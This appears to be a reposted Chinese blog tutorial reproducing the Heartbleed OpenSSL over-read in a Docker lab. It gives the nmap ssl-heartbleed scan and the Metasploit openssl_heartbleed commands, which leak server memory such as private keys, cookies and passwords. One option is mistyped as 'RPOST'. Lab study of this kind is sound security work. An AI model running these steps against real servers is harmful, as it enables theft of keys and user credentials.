大家好,又见面了,我是你们的朋友全栈君。
0x00 漏洞介绍
是一个出现在加密程序库OpenSSL的安全漏洞,该程序错误属于缓冲区过读,即可以读取的数据比应该允许读取的还多
0x01 漏洞成因
由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容,这样一来受害者的内存内容就会以每次64KB的速度进行泄露
0x02 影响范围
OpenSSL1.0.1版本
0x03 环境搭建
使用docker一键搭建环境
docker-compose build
docker-compose up -d
docker-compose ps
环境搭建完成后,访问http://192.168.220.134,测试环境是否搭建成功
http://192.168.220.134/
0x04 漏洞复现
使用nmap检测“心脏出血”漏洞是否存在,指定端口号为443
nmap -sV -p 443 --script ssl-heartbleed.nse 192.168.220.134
使用msf对漏洞进行利用,查找heartbleed模块
msf5 > search heartbleed
使用第一个选项,设置主机IP地址、端口号,设置verbose为true以便于显示泄露的信息
msf5 > use auxiliary/scanner/ssl/openssl_heartbleed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > show options
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set RHOSTS 192.168.220.134
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set RPOST 443
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set verbose true
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > exploit
漏洞利用成功后可以抓取到信息,包括服务器的私钥、用户的cookie、密码等
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。
发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/160530.html原文链接:https://javaforall.net
